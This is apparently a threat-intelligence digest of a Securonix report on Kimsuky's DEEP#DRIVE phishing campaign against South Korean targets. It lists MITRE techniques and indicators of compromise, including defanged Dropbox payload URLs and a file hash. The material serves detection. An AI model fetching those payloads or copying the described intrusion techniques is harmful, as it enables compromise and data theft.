FOCUS MODE
EXTRACT IOC
Threat Research

Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks

Securonix
Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks
The Securonix Threat Research team has identified a sophisticated malware campaign, DEEP#DRIVE, attributed to the North Korean group Kimsuky. Targeting South Korean businesses, government entities, and cryptocurrency users, the attackers utilize phishing lures crafted in Korean that masquerade as legitimate documents. The campaign employs various evasion techniques, including leveraging Dropbox for payload delivery and executing malicious PowerShell scripts to exfiltrate sensitive information. Affected: South Korean business sector, South Korean government sector, cryptocurrency users.

Keypoints :

  • Ongoing campaign attributed to Kimsuky targeting South Korea.
  • Involves multi-stage operations using tailored phishing lures in Korean.
  • Phishing documents masquerade as legitimate files like work logs and insurance documents.
  • Dropbox is used for hosting malicious payloads to evade detection.
  • PowerShell scripts are heavily utilized for payload delivery and reconnaissance.
  • Persistence mechanisms include creating scheduled tasks for recurring execution of malware.
  • Attackers employ code obfuscation techniques to avoid detection.
  • The campaign relies on the user’s action to download and execute malicious files.
  • Victimology indicates a focus on business, government, and cryptocurrency sectors in South Korea.

MITRE Techniques :

  • T1566.001: Phishing: Spearphishing Attachment – Utilized .lnk files disguised as legitimate documents.
  • T1071.001: Application Layer Protocol: Web Protocols – Leveraged Dropbox for command and control, and for exfiltration.
  • T1027: Obfuscated Files or Information – Employed obfuscation techniques to hide PowerShell scripts.
  • T1036: Masquerading – Used double file extensions to disguise malicious files.
  • T1059.001: Command and Scripting Interpreter: PowerShell – Executed PowerShell scripts for malicious activities.
  • T1102: Web Service – Exfiltrated data to Dropbox, treating it as a cloud service.
  • T1053.005: Scheduled Task/Job: Scheduled Task – Created a scheduled task for persistence.

Indicator of Compromise :

  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx
  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f.txt
  • [URL] hxxps://dl.dropboxusercontent[.]com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x.txt
  • [Email Address] 종신안내장V02_곽성환D.pdf.pdf
  • [Hash – SHA256] 079907B7FEAB3673A1767DBFBC0626E656F5D3B03B6CFF471CC7CF8A1973AB34

Full Story: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/

Tags: EXPLOIT, LOG ANALYSIS, EXFILTRATION, WINDOWS, BACKDOOR, PERSISTENCE, CLOUD, HUNTING